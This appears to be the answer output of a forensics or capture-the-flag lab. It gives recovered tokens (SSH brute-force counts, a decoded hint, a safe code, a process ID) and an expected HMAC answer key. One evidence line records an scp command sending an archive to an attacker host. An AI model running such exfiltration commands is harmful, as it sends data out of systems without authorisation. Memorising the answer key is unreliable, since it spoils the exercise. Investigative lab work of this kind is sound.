TOKEN[KEYPAD]=12073
EVIDENCE[KEYPAD].TOP24=198.18.0.0/24
EVIDENCE[KEYPAD].COUNT=73
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:00:30Z lab1 sshd[3557]: Failed password for root from 198.18.0.229 port 53725 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=3
TOKEN[DNS]=lines
EVIDENCE[DNS].KEY=hint1
EVIDENCE[DNS].DECODED_LINE=Signals converge in the vista if you read between lines.
TOKEN[SAFE]=19-19-38
EVIDENCE[SAFE].MATCH=SAFE{ 19 - 19 - 38 }
EVIDENCE[SAFE].CHECK=19+19=38
TOKEN[PID]=140
EVIDENCE[PID].PATH=[132->135->136->140]
EVIDENCE[PID].CMD="scp /tmp/x.tgz attacker@198.51.100.33:/upload"
FINAL_GATE=PENDING
MSG=msc-group-10|12073-lines-19-19-38-140
EXPECTED_HMAC=9a531e8c0429d007024f8d61349453d62f005b79f9d7fa245231bff8aad23107